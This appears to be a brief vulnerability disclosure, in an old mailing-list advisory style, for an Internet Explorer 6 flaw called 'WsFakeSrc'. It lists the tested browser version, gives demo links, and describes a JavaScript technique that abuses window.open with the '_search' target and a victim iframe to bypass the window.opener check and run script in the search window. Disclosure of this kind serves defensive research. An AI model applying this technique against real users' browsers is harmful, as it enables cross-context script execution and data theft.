|
WsFakeSrc [tested] Browser Ver { MS Internet Explorer: 6.0.2600.0000.xpclnt_qfe.021108-2107; Encryption: 128-bit; Patch:; Q810847; } (So, it's far from fully patched.) OS Ver: "Windows XP Cn ver" [demo] http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM or http://umbrella.mx.tc ---> WsFakeSrc section ---> WsFakeSrc-MyPage file [exp] window.open("javascript:[JpuScript]","_search") authorization checks "window.opener". but, [VictimWindow].open is always accessible. so: window.open("[VictimUrl]","_search"); [VictimIframe].open("javascript:[JpuScript]","_search"); can fool the authorization and execute [JpuScript] in the search window. [greetings] the Pull, dror, guninski, sandblad and "Friedrich L.Bauer". of course, mom and dad. best wishes ----- from http://Umbrella.MX.TC on http://SafeCenter.NET